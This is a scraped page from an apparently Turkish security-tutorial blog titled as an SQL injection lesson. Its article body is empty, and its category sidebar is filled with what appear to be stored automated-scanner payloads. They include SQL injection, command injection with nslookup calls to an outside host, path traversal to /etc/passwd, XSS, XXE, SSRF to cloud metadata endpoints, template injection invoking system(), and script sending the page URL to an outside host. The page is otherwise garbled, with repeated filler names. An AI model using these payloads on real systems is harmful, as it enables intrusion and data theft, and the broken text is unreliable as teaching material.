Ders 16 - SQL Injection (Medium Level)

Bu yazı .. tarihinde, saat 'de yazılmıştır.

Yazar :

Görüntülenme Sayısı :

Yorumlar

Henüz yorum girilmemiştir.

	#Kategoriler
	->	Genel
	->	Webgoat Uygulaması
	->	DVWA Uygulaması
	->	Çeşitli Sızma Teknikleri
	->	Güvenlik Araçları
	->	Linux Temelleri
	->	Genel Kültür (Siber Güvenlik)
	->
	->	Smith
	->
	->	Smith
	->
	->	Smith
	->
	->	Smith
	->
	->	Smith
	->
	->	%27
	->	-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
	->	-1 OR 1=1
	->	0
	->	-1 OR 1=1
	->	n3tsp4rke2
	->	1";expr 268409241 - 25218;"
	->	0
	->	"&ping -w 25 127.0.0.1 &"
	->	-1 OR 1=1
	->	nxtspxrkex
	->	1";expr 268409241 - 15115;"
	->	0
	->	-1 OR 1=1
	->	N3TSP4RKE2
	->	0
	->	&ping -w 25 127.0.0.1 &
	->	0
	->	ping -w 25 127.0.0.1 &
	->	/../../../../../../../../../../proc/self/fd/2
	->	NS-1NO
	->	%27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x02455D%29%3C%2FscRipt%3E
	->	1;expr 268409241 - 3248;x
	->	-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1 /* debc9719-8044-4e0f-a411-36141ede67d4 */
	->	ping -w 25 127.0.0.1
	->	/../../../../../../../../../../proc/self/fd/2.php
	->	%27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x02455E%29%3C%2FscRipt%3E
	->	1;expr 268409241 - 80437;x
	->	-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1 /* 5bf7ffe9-5496-4c16-9f05-fda1838a6379 */
	->
	->	/../../../../../../../../../../etc/httpd/logs/error.log
	->
	->	1
	->	data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDI0NTY0KTwvc2NyaXB0Pg==
	->	expr 268409241 - 96555;
	->
	->	Smith
	->	/../../../../../../../../../../etc/httpd/logs/error_log
	->	Smith
	->	-1" OR 1=1 OR "ns"="ns
	->	data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDI0NTY1KTwvc2NyaXB0Pg==
	->	expr 268409241 - 38627;
	->	Smith
	->
	->	/../../../../../../../../../../var/log/apache2/error.log
	->
	->	-1 OR 17-7=10
	->	expr 268409241 - 82920
	->
	->	Smith
	->	/../../../../../../../../../../var/log/apache/error.log
	->	Smith
	->	1 ns=netsparker(0x02456E)
	->	expr 268409241 - 77593
	->	Smith
	->
	->	/../../../../../../../../../../proc/version
	->
	->	1
	->	//r87.com/n/n.css?0x02457C
	->	/" class="boxFont">
	->
	->	Smith
	->	/../../../../../../../../../../proc/version.php
	->	Smith
	->	1
	->	//r87.com/n/n.css?0x02457D
	->	/" class="boxFont">
	->	Smith
	->
	->	/../../../../../../../../../../../etc/passwd
	->
	->	-1" OR 1=1 OR "1"="1
	->	//r87.com/n/j/?0x024581
	->	\|expr${IFS}268409241${IFS}-${IFS}3026
	->
	->	Smith
	->	file:///etc/passwd
	->	Smith
	->	-1" OR 1=1 OR "1"="1
	->	//r87.com/n/j/?0x024582
	->	\|expr${IFS}268409241${IFS}-${IFS}64469
	->	Smith
	->	hTTp://r87.com/n
	->
	->	/../../../../../../../../../../../etc/passwd
	->
	->	Smith
	->
	->
	->	http://r87.com/n?.php
	->	Smith
	->	/../../../../../../../../../../../etc/passwd.php
	->	Smith
	->	Smith
	->	print(int)0xFFF9999-39465
	->	Smith
	->	Smith
	->	http://r87.com/n?.php
	->	...//...//...//...//...//...//...//...//...//...//...//etc/passwd
	->
	->	Smith
	->	print(int)0xFFF9999-59961
	->
	->
	->	php://filter//resource=http://r87.com/n?.php
	->	....//....//....//....//....//....//....//....//....//....//....//etc/passwd
	->	{{268409241-60195}}
	->	Smith
	->	Smith
	->	print(int)0xFFF9999-15331;
	->	Smith
	->	Smith
	->	r87.com/n
	->	.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///etc/passwd
	->	{{268409241-30630}}
	->
	->	Smith
	->	print(int)0xFFF9999-87865;
	->
	->
	->
	->	. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /etc/passwd
	->	(268409241-48060)
	->	Smith
	->	Smith
	->	+print(int)0xFFF9999-66482;//
	->	Smith
	->	Smith
	->	Smith
	->	1/../../../../../../../../../../../etc/passwd
	->	(268409241-72237)
	->
	->	Smith
	->	+print(int)0xFFF9999-9113;//
	->
	->
	->
	->	/etc/passwd
	->
	->	Smith
	->	Smith
	->	Smith
	->	Smith
	->	Smith
	->	%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
	->	Smith
	->
	->	Smith
	->
	->
	->
	->	data:;base64,TlM3NzU0NTYxNDQ2NTc1
	->
	->	Smith
	->	Smith
	->	"+print(int)0xFFF9999-88799+"
	->	ns:netsparker056650=vuln
	->	Smith
	->	stYle=x:expre/**/ssion(netsparker(0x000009))
	->	/" class="boxFont">">
	->	"stYle="x:expre/**/ssion(netsparker(0x000009))
	->	-->
	->
	->	/ stYle=x:expre/**/ssion(netsparker(0x000009))
	->
	->	>
	->
	->	>
	->	Smith
	->	Smith
	->	kategoriEkle.php
	->	Smith
	->
	->	Smith
	->	"+print(int)0xFFF9999-51596+"
	->	http://example.com/? ns: netsparker056650=vuln
	->
	->
	->
	->	kategoriEkle.php
	->	Smith
	->	Smith
	->
	->	ns:netsparker056650=vuln
	->	Smith
	->	Smith
	->	Smith
	->	/adminPaneli/kategoriEkle.php
	->
	->	Smith
	->
	->
	->	ns:netsparker056650=vuln
	->
	->
	->
	->	WEB-INF/web.xml
	->	Smith
	->	N3tSp4rK3R
	->	]>&lfi/" class="boxFont">]>&lfi;
	->	Smith
	->	{php}print(int)0xFFF9999-23383;{/php}
	->
	->
	->	Smith
	->	Smith
	->	/../../../../../../../../../../WEB-INF/web.xml
	->
	->
	->	&thisdoesntexists;
	->	Smith
	->	{php}print(int)0xFFF9999-55722;{/php}
	->
	->	Smith
	->	NS09＜s1﹥DBLʺSNGLʹNS09
	->	http://aws.r87.me/latest/meta-data/public-hostname
	->	/../../../../../../../../../../var/log/apache2/access.log
	->	Smith
	->	Smith
	->
	->	Smith
	->
	->
	->
	->	xgk8ms5ynfcpgbqm9n_rfb2x6i3qxbvm4kgbnrjzf4u.r87.me
	->	http://169.254.169.254/latest/meta-data/public-hostname
	->	/../../../../../../../../../../etc/httpd/logs/access.log
	->	%dtd]>&a/" class="boxFont"> %dtd;]>&a;
	->	Smith
	->	Smith
	->	Smith
	->	Smith
	->	Smith
	->	xgk8ms5ynfmclmcqilvgahyriqwb5mlvjyd8jj4toka.r87.me
	->	http://127.0.0.1:22
	->	/../../../../../../../../../../var/log/nginx/access.log
	->	%dtd]>&a/" class="boxFont"> %dtd;]>&a;
	->	http://xgk8ms5ynfdd5z0lzszikr6tqletnjnmzkegb61e_wh.r87.me/p/
	->
	->	Smith
	->	[php]print(int)0xFFF9999-20120;[/php]
	->
	->
	->	//xgk8ms5ynf1ldc6cb_p8qyu3u0ystuqmfl-comueks4.r87.me
	->	http://46.45.187.221:22
	->	/../../../../../../../../../../opt/lampp/logs/access_log
	->	%dtd]>&a/" class="boxFont"> %dtd;]>&a;
	->	http://xgk8ms5ynfqjwjgza5nrtovrumpdmx0zyxeindgmayn.r87.me/p/
	->	Smith
	->	Smith
	->	[php]print(int)0xFFF9999-69544;[/php]
	->	Smith
	->	Smith
	->	//xgk8ms5ynfv0d2ebpzky-xhyybvugz7ofk8qsmx1nok.r87.me
	->	http://[::1]:22
	->	/../../../../../../../../../../var/log/lighttpd/access.log
	->	%dtd]>&a/" class="boxFont"> %dtd;]>&a;
	->	php://filter//resource=http://xgk8ms5ynf660ujmtup4a_g2867jjtfgodmshlevpwp.r87.me/p/
	->	Smith
	->
	->
	->	http://r87.me/r/?id=xgk8ms5ynfscjj4a5igiarcbsknqcrtpjmmpdbyaf48
	->	http://127.0.0.1:3306
	->	/../../../../../../../../../../var/log/apache/access.log
	->
	->	php://filter//resource=http://xgk8ms5ynf21wfu2kjk_zj0pxnewnpohciv5xnsz1bb.r87.me/p/
	->	Smith
	->	Smith
	->	Smith
	->	http://r87.me/r/?id=xgk8ms5ynf8nl1tt7ttvmyeyek_bikgpvmqbnjppds0
	->	http://46.45.187.221:3306
	->
	->	Smith
	->	xgk8ms5ynftf1yrbdiitk0xfmwjwtcaf3cysaxaruhz.r87.me/p/
	->	Smith
	->
	->
	->
	->	http://[::1]:3306
	->	Smith
	->
	->	xgk8ms5ynfcc7tdslqo6aeh3hghw1xae_fggfbegi8v.r87.me/p/
	->	Smith
	->
	->	Smith
	->	Smith
	->	Smith
	->	http://www.includekarabuk.com/server-status
	->
	->	Smith
	->
	->	Smith
	->	Smith
	->
	->
	->
	->	http://169.254.169.254/opc/v1/instance
	->	Smith
	->
	->	Smith
	->	Smith
	->
	->	Smith
	->	Smith
	->	Smith
	->	https://metadata.packet.net/metadata
	->
	->	Smith
	->
	->	Smith
	->	Smith
	->
	->
	->
	->	Smith
	->	Smith
	->	Smith
	->
	->	Smith
	->	Smith
	->	Smith
	->
	->
	->	Smith
	->	Smith
	->
	->
	->	Smith
	->	Smith
	->	Smith
	->
	->	Smith
	->	Smith
	->
	->	Smith
	->	Smith
	->
	->
	->	Smith
	->
	->	Smith
	->	Smith
	->
	->	Smith
	->
	->	nslookup "xgk8ms5ynfygx_kyqgxq5pncrskehjtnqw6akc6y""plg.r87.me"
	->
	->	Smith
	->
	->	Smith
	->	nslookup "xgk8ms5ynfpnx1oofhtq9zoysu9_7ud61m6qvb_6""xt8.r87.me"
	->	Smith
	->
	->	Smith
	->
	->	&nslookup "xgk8ms5ynfq8jeb3rffzyqdtrohqm35wwbo0xkdy""iuu.r87.me"
	->
	->	Smith
	->
	->	Smith
	->	&nslookup "xgk8ms5ynfizhiaa6fxkfv42f1pmnhm9i_1mkbx5""uoe.r87.me"
	->	Smith
	->
	->	Smith
	->
	->
	->	Smith
	->
	->	Smith
	->	Smith
	->
	->	Smith
	->
	->	"&nslookup "xgk8ms5ynfjmb8k8xjzfcqfywbgiwyk5v0f03c6q""dm0.r87.me"
	->
	->	Smith
	->
	->	Smith
	->	"&nslookup "xgk8ms5ynfidvenjzcvfvff-dsqpr1iiyqjvs_ua""udk.r87.me"
	->	Smith
	->
	->	Smith
	->
	->	\|nslookup${IFS}"xgk8ms5ynfbbcie-boll27yzglyesox65rcvfj2q""cwk.r87.me"
	->
	->	Smith
	->
	->	Smith
	->	\|nslookup${IFS}"xgk8ms5ynfqxd5smzgwyhfzl5blp71sgebbsjghh""ehs.r87.me"
	->	Smith
	->
	->	Smith
	->
	->
	->	Smith
	->
	->	Smith
	->	Smith
	->
	->	Smith
	->
	->
	->	Smith
	->	Smith
	->	{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("nslookup xgk8ms5ynfjtct4yddltrv06mvlt4673eucfv16g"~"au0.r87.me")}}
	->	Smith
	->
	->
	->	{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("nslookup xgk8ms5ynfa3jiit-zcz30aa66_clgeauopnmgrn"~"ek0.r87.me")}}
	->
	->	Smith
	->	Smith
	->
	->	Smith
	->
	->
	->
	->	Smith
	->	Smith
	->	Smith
	->
	->
	->
	->	Smith
	->	Smith
	->	Smith
	->	";l=document.createElement("link");l.rel="prefetch";l.href="//xgk8ms5ynfthwbghd2q7gck6hx_mg6e9ymnajbva"+"9no.r87.me/r/?"+location.href;document.head.appendChild(l);//
	->
	->
	->
	->	Smith
	->	Smith
	->	";l=document.createElement("link");l.rel="prefetch";l.href="//xgk8ms5ynfnsybmi-qd6mi26daaf8srldbqn2drn"+"o-c.r87.me/r/?"+location.href;document.head.appendChild(l);//
	->	Smith
	->
	->
	->
	->	Smith
	->	Smith
	->	Smith
	->
	->
	->
	->	Smith
	->	Smith
	->	Smith
	->
	->
	->
	->	Smith
	->	Smith
	->	Smith
	->
	->
	->
	->	Smith
	->	Smith
	->	Smith
	->
	->
	->
	->	Smith
	->	Smith
	->	Smith
	->
	->
	->
	->	Smith
	->	Smith
	->	Smith
	->
	->
	->
	->	Smith
	->	Smith
	->	Smith
	->
	->
	->
	->	Smith
	->	Smith
	->	Smith
	->
	->
	->
	->	Smith
	->	Smith
	->	Smith
	->
	->
	->
	->	Smith
	->	Smith
	->	Smith
	->
	->
	->
	->	Smith
	->	Smith
	->	Smith
	->
	->
	->
	->	Smith
	->	Smith
	->	Smith
	->
	->
	->	Smith
	->	Smith
	->
	->
	->	Smith
	->
	->
	->
	->	Smith
	->	/" class="boxFont"><iframe src="//xgk8ms5ynfasao5u0h4tikr6llmerskreybz4a0qiy0.r87.me">
	->	/" class="boxFont"><iframe src="//xgk8ms5ynfvtrkkowx824tchzck5wkra5_li7vmqayk.r87.me">
	->
	->	Smith
	->
	->	Smith
	->
	->	Smith
	->
	->	Smith
	->
	->	Smith
	->
	->	Smith
	->
	->	Smith
	->
	->	Smith

#Popüler Yazılar
	->	3
	->	3
	->
	->
	->

#En Son Yazılar
	->
	->
	->	3
	->
	->	3

#Arşiv
	► 2014 ► Ekim () ► Kasım () ► Aralık () ► 2015 ► Ocak () ► Şubat () ► Mart () ► Nisan () ► Mayıs () ► Haziran () ► Temmuz () ► Ağustos () ► Eylül () ► Ekim () ► Kasım () ► Aralık () ► 2016 ► Ocak () ► Şubat () ► Mart () ► Nisan () ► Mayıs () ► Haziran () ► Temmuz () ► Ağustos () ► Eylül () ► Ekim () ► Kasım () ► Aralık () ► 2017 ► Ocak () ► Şubat () ► Mart () ► Nisan () ► Mayıs () ► Haziran () ► Temmuz () ► Ağustos () ► Eylül () ► Ekim () ► Kasım () ► Aralık () ► 2018 ► Ocak () ► Şubat () ► Mart () ► Nisan () ► Mayıs () ► Haziran () ► Temmuz () ► Ağustos () ► Eylül () ► Ekim () ► Kasım () ► Aralık () ► 2019 ► Ocak () ► Şubat () ► Mart () ► Nisan () ► Mayıs () ► Haziran () ► Temmuz () ► Ağustos () ► Eylül () ► Ekim () ► Kasım () ► Aralık () ► 2020 ► Ocak () ► Şubat () ► Mart () ► Nisan () ► Mayıs () ► Haziran () ► Temmuz () ► Ağustos () ► Eylül () ► Ekim () ► Kasım () ► Aralık () ► 2021 ► Ocak () ► Şubat () ► Mart () ► Nisan () ► Mayıs () ► Haziran () ► Temmuz () ► Ağustos () ► Eylül () ► Ekim () ► Kasım () ► Aralık () ▼ 2022 ► Ocak (0) ► Şubat (0) ► Mart (0) ► Nisan (0) ► Mayıs (0) ► Haziran (5) • • • 3 • • 3

#Giriş

	ID	:
	Şifre	: